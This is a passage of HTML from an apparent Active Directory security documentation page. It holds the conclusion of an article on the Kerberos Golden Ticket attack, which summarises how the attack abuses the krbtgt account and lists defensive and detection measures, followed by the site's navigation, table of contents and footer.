<p>The Golden Ticket attack remains one of the most potent persistence techniques in Active Directory. Its power stems from exploiting the core <code>krbtgt</code> account, allowing attackers to bypass normal authentication controls almost indefinitely. While preventing the initial compromise is paramount, specific defenses focus on rigorously protecting Domain Controllers, limiting privileged access, enabling modern security features like Credential Guard, and critically, having a plan to rotate the <code>krbtgt</code> password securely. Robust detection capabilities focusing on credential theft, abnormal Kerberos ticket activity, and DCSync attempts are essential for identifying this attack before significant damage occurs.</p></div></article><nav class="docusaurus-mt-lg pagination-nav" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/docs/category/kerberos-1"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">Kerberos</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/docs/active_directory/kerberos/intro"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">Introduction</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#1-introduction" class="table-of-contents__link toc-highlight">1. Introduction</a></li><li><a href="#2-background-kerberos-authentication-simplified" class="table-of-contents__link toc-highlight">2. Background: Kerberos Authentication (Simplified)</a></li><li><a href="#3-the-krbtgt-account" class="table-of-contents__link toc-highlight">3. The <code>krbtgt</code> Account</a></li><li><a href="#4-how-the-golden-ticket-attack-works" class="table-of-contents__link toc-highlight">4. How the Golden Ticket Attack Works</a></li><li><a href="#5-tools" class="table-of-contents__link toc-highlight">5. Tools</a></li><li><a href="#6-example-scenario-using-mimikatz-on-a-compromised-machine" class="table-of-contents__link toc-highlight">6. Example Scenario (using Mimikatz on a compromised machine)</a></li><li><a href="#7-detection" class="table-of-contents__link toc-highlight">7. Detection</a></li><li><a href="#8-prevention-and-mitigation" class="table-of-contents__link toc-highlight">8. Prevention and Mitigation</a></li><li><a href="#9-conclusion" class="table-of-contents__link toc-highlight">9. Conclusion</a></li></ul></div></div></div></div></main></div></div></div><footer class="theme-layout-footer footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="theme-layout-footer-column col footer__col"><div class="footer__title">Docs</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="/docs/category/active-directory">Active Directory</a></li></ul></div><div class="theme-layout-footer-column col footer__col"><div class="footer__title">Community</div><ul class="footer__items clean-list"><li class="footer__item"><a href="https://stackoverflow.com/questions/tagged/docusaurus" target="_blank" rel="noopener noreferrer" class="footer__link-item">Stack Overflow<svg width="13.5" height="13.5" aria-hidden="true" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://discordapp.com/invite/docusaurus" target="_blank" rel="noopener noreferrer" class="footer__link-item">Discord<svg width="13.5" height="13.5" aria-hidden="true" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://x.com/docusaurus" target="_blank" rel="noopener noreferrer" class="footer__link-item">X<svg width="13.5" height="13.5" aria-hidden="true" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li></ul></div><div class="theme-layout-footer-column col footer__col"><div class="footer__title">More</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="/blog">Blog</a></li><li class="footer__item"><a href="https://github.com/elodvk" target="_blank" rel="noopener noreferrer" class="footer__link-item">GitHub<svg width="13.5" height="13.5" aria-hidden="true" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li></ul></div></div><div class="footer__bottom text--center"><div class="footer__copyright">Copyright © 2025 elodvk</div></div></div></footer></div>
</body>
</html>